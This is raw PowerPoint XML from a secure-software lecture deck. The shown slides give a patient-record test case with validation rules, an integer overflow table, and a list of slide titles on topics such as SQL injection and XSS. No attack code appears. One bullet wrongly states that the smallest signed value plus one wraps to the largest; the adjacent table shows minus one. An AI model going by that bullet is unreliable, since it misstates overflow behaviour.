                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1.  Name must include alphabetic characters.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2.  State must be legal and zip code must be a legal zip code for the state.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3.  Phone number must be 10+ numeric digits.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4.  Insurance must be one of a set of accepted insurance companies, or specify ‘no insurance’.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>5.  Birth year must be between 1900 and the current year; birth month, day must be valid days.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>6.  Required fields include all fields except email, secondary phone, and if ‘no insurance’ is selected, insurance information.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3009058317"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2377560">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Postconditions:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1.  The new record has been saved into the test database. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2. For Patients with health plans, a Patient Plan Management tab is available with information about the Patient’s plan.  For Patients without, a Patient Bill Management tab is provided.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>3. Logs exist for attack conditions: SQL attacks and violation of business rules.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4. An encrypted transaction log includes the new records, including who and when the transaction occurred.</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25000"/>
                        <a:lumOff val="75000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3585446405"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8F9ADD-1EA9-0492-2D38-0EB4DF87E3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test Case: Business Rules, Postconditions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1432923320"/>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5EC2C-8EE7-4A59-A867-CF63A1FECE9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integer Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6147E3-BB48-4500-A2D2-94FD3CC37B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="381000" y="2133600"/>
          <a:ext cx="4876801" cy="2754630"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1562648">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2871426152"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1562648">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="481222075"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1751505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="827448168"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Data type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a:effectLst/>
                        </a:rPr>
                        <a:t>Operation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dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Result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40017212"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Signed char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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>127+1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600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-128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6200240"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-128-1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600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+127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44318662"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Unsigned char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600">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>255+1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600">
                          <a:effectLst/>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1292309"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Signed int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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2,147,483,647 +1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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-2,147,483,648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3995028"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc vMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>-2,147,483,648 -1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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+2,147,483,647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28519293"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Unsigned int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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>4,294,967,295 +1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600" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>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78572231"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7417280B-31C3-4C3F-9A80-0A8640575B0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="1981200"/>
            <a:ext cx="3200400" cy="3886200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Computer math operates in a modulo way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Largest signed + 1 = Smallest signed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Smallest signed + 1 = Largest signed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Largest unsigned + 1 = 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Float overflows to “infinity”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="441417376"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Springer_2012">
  <a:themeElements>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fontScheme name="Springer_20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lnDef>
    <a:txDef>
      <a:spPr>
        <a:noFill/>
      </a:spPr>
      <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
        <a:noAutofit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="l">
          <a:lnSpc>
            <a:spcPts val="2200"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPts val="900"/>
          </a:spcBef>
          <a:buClr>
            <a:schemeClr val="accent2"/>
          </a:buClr>
          <a:buSzPct val="100000"/>
          <a:defRPr sz="1800" dirty="0" err="1" smtClean="0">
            <a:latin typeface="+mn-lt"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="SPRINGER_ssbm_E 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="002143"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="CCCCD2"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="FF9A6E"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="F76013"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FFCABA"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="E05610"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="FFCAB0"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="A5A5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springerPPT</Template>
  <TotalTime>7569</TotalTime>
  <Words>7922</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>996</Paragraphs>
  <Slides>86</Slides>
  <Notes>45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86</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="95" baseType="lpstr">
      <vt:lpstr>Algerian</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Chiller</vt:lpstr>
      <vt:lpstr>Symbol</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Springer_2012</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Understanding Software Threats and Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vocabulary</vt:lpstr>
      <vt:lpstr>Attack Surface Analysis</vt:lpstr>
      <vt:lpstr>Attack Surface Minimization</vt:lpstr>
      <vt:lpstr>Validating Input</vt:lpstr>
      <vt:lpstr>Problem:   Incorrect Input</vt:lpstr>
      <vt:lpstr>Control:  Input Validation</vt:lpstr>
      <vt:lpstr>Problem:  Buffer overflow</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Attack: SQL Injection</vt:lpstr>
      <vt:lpstr>Attack: SQL Injection</vt:lpstr>
      <vt:lpstr>Attack:  OS Command Injection</vt:lpstr>
      <vt:lpstr>Other Injection Types</vt:lpstr>
      <vt:lpstr>Injection Fix:  Input Sanitization</vt:lpstr>
      <vt:lpstr>Control:  Avoid OS Command Injection</vt:lpstr>
      <vt:lpstr>Attack: Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>XSS Example Attack</vt:lpstr>
      <vt:lpstr>Attack: Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>Attack: DOM-Based XSS</vt:lpstr>
      <vt:lpstr>Summary: Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Control:  Content security policy</vt:lpstr>
      <vt:lpstr>XSS Controls: Validate Output</vt:lpstr>
      <vt:lpstr>External XML Input</vt:lpstr>
      <vt:lpstr>Problem: Race Condition</vt:lpstr>
      <vt:lpstr>Problem: Chatty Error Messages</vt:lpstr>
      <vt:lpstr>Control: Logging</vt:lpstr>
      <vt:lpstr>Control:   Test All Software!!!</vt:lpstr>
      <vt:lpstr>Authentication Attacks</vt:lpstr>
      <vt:lpstr>Authentication Misuse</vt:lpstr>
      <vt:lpstr>Control: Prevent Forgery</vt:lpstr>
      <vt:lpstr>Attack: Removed Local Authorization</vt:lpstr>
      <vt:lpstr>Attack: Reused Session IDs</vt:lpstr>
      <vt:lpstr>Attack: Reused Session IDs</vt:lpstr>
      <vt:lpstr>Control: Server-Side Authentication</vt:lpstr>
      <vt:lpstr>Attack: Forgery Cross-Site-Request Forgery</vt:lpstr>
      <vt:lpstr>Attack: Forgery Cross-Site-Request Forgery</vt:lpstr>
      <vt:lpstr>Problem: Incorrect Access Permissions</vt:lpstr>
      <vt:lpstr>Attack:   Broken Access Control </vt:lpstr>
      <vt:lpstr>Insecure Deserialization</vt:lpstr>
      <vt:lpstr>Insecure Deserialization, XML Input</vt:lpstr>
      <vt:lpstr>Control: Jail, Sandbox, Rate Limiting</vt:lpstr>
      <vt:lpstr>Control: Authentication &amp; Permissions</vt:lpstr>
      <vt:lpstr>Control: Authentication &amp; Permissions</vt:lpstr>
      <vt:lpstr>Controls: Access Control</vt:lpstr>
      <vt:lpstr>Security Features</vt:lpstr>
      <vt:lpstr>Attack: Cleartext Transmit of Sensitive Info</vt:lpstr>
      <vt:lpstr>Secure Software Utilities</vt:lpstr>
      <vt:lpstr>Control: Control Critical State Data</vt:lpstr>
      <vt:lpstr>Logging</vt:lpstr>
      <vt:lpstr>Problem: Adopting Untrusted Software</vt:lpstr>
      <vt:lpstr>Lower-level Programming Rules</vt:lpstr>
      <vt:lpstr>Lower-level Programming Rules</vt:lpstr>
      <vt:lpstr>Testing</vt:lpstr>
      <vt:lpstr>Testing</vt:lpstr>
      <vt:lpstr>Developing a Test Case</vt:lpstr>
      <vt:lpstr>Test Case: Flow of Events</vt:lpstr>
      <vt:lpstr>Test Case: Flow of Events (continued)</vt:lpstr>
      <vt:lpstr>Test Case: Business Rules, Postconditions</vt:lpstr>
      <vt:lpstr>Reducing Vulnerabilities in Deployment</vt:lpstr>
      <vt:lpstr>Problem: Reliance on Untrusted Inputs</vt:lpstr>
      <vt:lpstr>Security Misconfiguration</vt:lpstr>
      <vt:lpstr>Attack: Path Traversal</vt:lpstr>
      <vt:lpstr>Using Components with Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>Other software problems</vt:lpstr>
      <vt:lpstr>Checking Understanding</vt:lpstr>
      <vt:lpstr>Test Yourself: Other Security Errors</vt:lpstr>
      <vt:lpstr>Test Yourself: Other Security Errors</vt:lpstr>
      <vt:lpstr>Test Yourself: More Security Errors</vt:lpstr>
      <vt:lpstr>Test Yourself: More Security Errors</vt:lpstr>
      <vt:lpstr>Definition Matching</vt:lpstr>
      <vt:lpstr>Definition Matching</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Question</vt:lpstr>
      <vt:lpstr>Health First Case Study</vt:lpstr>
      <vt:lpstr>Developing a Test Case</vt:lpstr>
      <vt:lpstr>Test Case: Flow of Events</vt:lpstr>
      <vt:lpstr>Test Case: Flow of Events (continued)</vt:lpstr>
      <vt:lpstr>Test Case: Business Rules, Postconditions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Insurance Portability &amp; Accountability  Act (HIPAA)</dc:title>
  <dc:creator>Susan J Lincke</dc:creator>
  <cp:lastModifiedBy>Susan Lincke</cp:lastModifiedBy>
  <cp:revision>249</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-06-17T21:04:01Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T23:27:27Z</dcterms:modified>
</cp:coreProperties>
</file>